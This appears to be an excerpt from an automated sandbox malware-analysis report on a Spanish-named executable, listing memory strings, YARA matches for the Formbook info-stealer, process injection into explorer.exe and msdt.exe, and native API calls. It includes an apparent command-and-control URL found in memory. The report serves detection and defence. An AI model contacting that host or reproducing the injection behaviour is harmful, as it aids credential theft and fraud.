            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: msdt.exe, 00000005.00000002.482494718.0000000002B17000.00000004.00000020.sdmpString found in binary or memory: http://www.tiaozaoxinlingshou.net/8zdn/?kH=/eNJxuqSWy6YBrvXrJK0
            Source: explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: transferir copia_98087.exe, 00000000.00000003.213582395.0000000005F7B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comFa
            Source: transferir copia_98087.exe, 00000000.00000003.213440315.0000000005F7B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comj
            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: transferir copia_98087.exe, 00000000.00000002.226455880.0000000003111000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
            Source: transferir copia_98087.exe, 00000000.00000002.225323893.0000000001438000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000001.00000002.271460615.0000000001650000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.226723237.0000000004119000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.482399403.00000000029E0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.482304869.00000000029B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.481691358.0000000002510000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.271138135.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.271410444.0000000001500000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 1.2.transferir copia_98087.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.transferir copia_98087.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.transferir copia_98087.exe.4299960.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.transferir copia_98087.exe.424a540.2.raw.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000001.00000002.271460615.0000000001650000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.271460615.0000000001650000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.226723237.0000000004119000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.226723237.0000000004119000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.482399403.00000000029E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.482399403.00000000029E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.482304869.00000000029B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.482304869.00000000029B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.481691358.0000000002510000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.481691358.0000000002510000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.271138135.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.271138135.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.271410444.0000000001500000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.271410444.0000000001500000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.transferir copia_98087.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.transferir copia_98087.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.transferir copia_98087.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.transferir copia_98087.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.transferir copia_98087.exe.4299960.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.transferir copia_98087.exe.4299960.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.transferir copia_98087.exe.424a540.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.transferir copia_98087.exe.424a540.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_004181C0 NtCreateFile,1_2_004181C0
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_00418270 NtReadFile,1_2_00418270
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_004182F0 NtClose,1_2_004182F0
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_004183A0 NtAllocateVirtualMemory,1_2_004183A0
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_00418212 NtReadFile,1_2_00418212
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_004182EF NtClose,1_2_004182EF
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_0041839B NtAllocateVirtualMemory,1_2_0041839B
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A499A0 NtCreateSection,LdrInitializeThunk,1_2_01A499A0
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A495D0 NtClose,LdrInitializeThunk,1_2_01A495D0
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_01A49910
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49540 NtReadFile,LdrInitializeThunk,1_2_01A49540
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A498F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_01A498F0
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49860 NtQuerySystemInformation,LdrInitializeThunk,1_2_01A49860
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49840 NtDelayExecution,LdrInitializeThunk,1_2_01A49840
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A497A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_01A497A0
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49780 NtMapViewOfSection,LdrInitializeThunk,1_2_01A49780
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49FE0 NtCreateMutant,LdrInitializeThunk,1_2_01A49FE0
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49710 NtQueryInformationToken,LdrInitializeThunk,1_2_01A49710
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A496E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_01A496E0
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49A20 NtResumeThread,LdrInitializeThunk,1_2_01A49A20
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_01A49A00
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_01A49660
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49A50 NtCreateFile,LdrInitializeThunk,1_2_01A49A50
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A495F0 NtQueryInformationFile,1_2_01A495F0
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A499D0 NtCreateProcessEx,1_2_01A499D0
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49520 NtWaitForSingleObject,1_2_01A49520
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A4AD30 NtSetContextThread,1_2_01A4AD30
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49560 NtWriteFile,1_2_01A49560
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49950 NtQueueApcThread,1_2_01A49950
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A498A0 NtWriteVirtualMemory,1_2_01A498A0
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49820 NtEnumerateKey,1_2_01A49820
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A4B040 NtSuspendThread,1_2_01A4B040
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A4A3B0 NtGetContextThread,1_2_01A4A3B0
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49730 NtQueryVirtualMemory,1_2_01A49730
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49B00 NtSetValueKey,1_2_01A49B00
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A4A710 NtOpenProcessToken,1_2_01A4A710
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49760 NtOpenProcess,1_2_01A49760
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49770 NtSetInformationFile,1_2_01A49770
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A4A770 NtOpenThread,1_2_01A4A770
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49A80 NtOpenDirectoryObject,1_2_01A49A80
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A496D0 NtCreateKey,1_2_01A496D0
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49610 NtEnumerateValueKey,1_2_01A49610
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49A10 NtQuerySection,1_2_01A49A10
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49670 NtQueryInformationProcess,1_2_01A49670
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A49650 NtQueryValueKey,1_2_01A49650
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B95D0 NtClose,LdrInitializeThunk,5_2_049B95D0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9540 NtReadFile,LdrInitializeThunk,5_2_049B9540
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B96D0 NtCreateKey,LdrInitializeThunk,5_2_049B96D0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B96E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_049B96E0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9650 NtQueryValueKey,LdrInitializeThunk,5_2_049B9650
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_049B9660
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9780 NtMapViewOfSection,LdrInitializeThunk,5_2_049B9780
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9FE0 NtCreateMutant,LdrInitializeThunk,5_2_049B9FE0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9710 NtQueryInformationToken,LdrInitializeThunk,5_2_049B9710
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9840 NtDelayExecution,LdrInitializeThunk,5_2_049B9840
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9860 NtQuerySystemInformation,LdrInitializeThunk,5_2_049B9860
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B99A0 NtCreateSection,LdrInitializeThunk,5_2_049B99A0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_049B9910
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9A50 NtCreateFile,LdrInitializeThunk,5_2_049B9A50
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B95F0 NtQueryInformationFile,5_2_049B95F0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049BAD30 NtSetContextThread,5_2_049BAD30
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9520 NtWaitForSingleObject,5_2_049B9520
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9560 NtWriteFile,5_2_049B9560
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9610 NtEnumerateValueKey,5_2_049B9610
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9670 NtQueryInformationProcess,5_2_049B9670
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B97A0 NtUnmapViewOfSection,5_2_049B97A0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049BA710 NtOpenProcessToken,5_2_049BA710
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9730 NtQueryVirtualMemory,5_2_049B9730
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049BA770 NtOpenThread,5_2_049BA770
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9770 NtSetInformationFile,5_2_049B9770
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9760 NtOpenProcess,5_2_049B9760
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B98A0 NtWriteVirtualMemory,5_2_049B98A0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B98F0 NtReadVirtualMemory,5_2_049B98F0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9820 NtEnumerateKey,5_2_049B9820
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049BB040 NtSuspendThread,5_2_049BB040
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B99D0 NtCreateProcessEx,5_2_049B99D0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9950 NtQueueApcThread,5_2_049B9950
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9A80 NtOpenDirectoryObject,5_2_049B9A80
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9A10 NtQuerySection,5_2_049B9A10
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9A00 NtProtectVirtualMemory,5_2_049B9A00
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9A20 NtResumeThread,5_2_049B9A20
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049BA3B0 NtGetContextThread,5_2_049BA3B0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049B9B00 NtSetValueKey,5_2_049B9B00
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02528270 NtReadFile,5_2_02528270
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_025282F0 NtClose,5_2_025282F0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_025283A0 NtAllocateVirtualMemory,5_2_025283A0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_025281C0 NtCreateFile,5_2_025281C0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02528212 NtReadFile,5_2_02528212
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_025282EF NtClose,5_2_025282EF
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0252839B NtAllocateVirtualMemory,5_2_0252839B
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 0_2_0308F3710_2_0308F371
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 0_2_0308F3800_2_0308F380
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 0_2_0308D0F40_2_0308D0F4
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 0_2_05A4F4F80_2_05A4F4F8
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 0_2_05A4B6A00_2_05A4B6A0
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 0_2_05A4C1800_2_05A4C180
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_004010301_2_00401030
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_0041B9841_2_0041B984
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_0041C2201_2_0041C220
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_0041BC521_2_0041BC52
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_00408C5B1_2_00408C5B
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_00408C601_2_00408C60
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_0041CC9E1_2_0041CC9E
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_0041C5371_2_0041C537
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_00402D901_2_00402D90
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_0041BE701_2_0041BE70
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_0041CF661_2_0041CF66
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_0041BF901_2_0041BF90
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_00402FB01_2_00402FB0
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A325811_2_01A32581
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A1D5E01_2_01A1D5E0
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01AD25DD1_2_01AD25DD
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A00D201_2_01A00D20
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A241201_2_01A24120
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A0F9001_2_01A0F900
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01AD2D071_2_01AD2D07
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01AD1D551_2_01AD1D55
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A320A01_2_01A320A0
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01AD20A81_2_01AD20A8
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A1B0901_2_01A1B090
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01AD28EC1_2_01AD28EC
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01AC10021_2_01AC1002
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A1841F1_2_01A1841F
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A3EBB01_2_01A3EBB0
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01AD1FF11_2_01AD1FF1
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01ACDBD21_2_01ACDBD2
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01AD2B281_2_01AD2B28
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01AD22AE1_2_01AD22AE
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01AD2EF71_2_01AD2EF7
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 1_2_01A26E301_2_01A26E30
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04A344965_2_04A34496
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0498841F5_2_0498841F
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04A3D4665_2_04A3D466
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049A25815_2_049A2581
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0498D5E05_2_0498D5E0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04A425DD5_2_04A425DD
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04A42D075_2_04A42D07
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04970D205_2_04970D20
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04A41D555_2_04A41D55
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04A42EF75_2_04A42EF7
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04996E305_2_04996E30
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04A3D6165_2_04A3D616
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04A41FF15_2_04A41FF1
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04A4DFCE5_2_04A4DFCE
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0498B0905_2_0498B090
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04A420A85_2_04A420A8
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049A20A05_2_049A20A0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04A428EC5_2_04A428EC
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04A4E8245_2_04A4E824
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04A310025_2_04A31002
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0499A8305_2_0499A830
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049999BF5_2_049999BF
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0497F9005_2_0497F900
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049941205_2_04994120
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04A422AE5_2_04A422AE
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04A34AEF5_2_04A34AEF
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04A2FA2B5_2_04A2FA2B
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049AEBB05_2_049AEBB0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04A223E35_2_04A223E3
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049AABD85_2_049AABD8
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04A3DBD25_2_04A3DBD2
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04A303DA5_2_04A303DA
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04A42B285_2_04A42B28
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0499A3095_2_0499A309
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0499AB405_2_0499AB40
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0252B9845_2_0252B984
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0252CF665_2_0252CF66
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0252BF905_2_0252BF90
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02512FB05_2_02512FB0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02518C5B5_2_02518C5B
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02518C605_2_02518C60
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0252CC9E5_2_0252CC9E
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0252C5375_2_0252C537
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02512D905_2_02512D90
            Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0497B150 appears 124 times
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: String function: 01A0B150 appears 35 times
            Source: transferir copia_98087.exe, 00000000.00000002.226723237.0000000004119000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLegacyPathHandling.dllN vs transferir copia_98087.exe
            Source: transferir copia_98087.exe, 00000000.00000002.225323893.0000000001438000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs transferir copia_98087.exe
            Source: transferir copia_98087.exe, 00000000.00000002.233022672.0000000008EC0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs transferir copia_98087.exe
            Source: transferir copia_98087.exe, 00000000.00000002.232951484.0000000008E90000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAsyncState.dllF vs transferir copia_98087.exe
            Source: transferir copia_98087.exe, 00000000.00000002.223882180.0000000000D24000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBuiltInPermissionSets.exe< vs transferir copia_98087.exe
            Source: transferir copia_98087.exe, 00000001.00000000.223139596.0000000000FA4000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBuiltInPermissionSets.exe< vs transferir copia_98087.exe
            Source: transferir copia_98087.exe, 00000001.00000002.271869350.0000000001AFF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs transferir copia_98087.exe
            Source: transferir copia_98087.exe, 00000001.00000002.272134673.0000000003720000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs transferir copia_98087.exe
            Source: transferir copia_98087.exeBinary or memory string: OriginalFilenameBuiltInPermissionSets.exe< vs transferir copia_98087.exe
            Source: transferir copia_98087.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 00000001.00000002.271460615.0000000001650000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.271460615.0000000001650000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.226723237.0000000004119000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
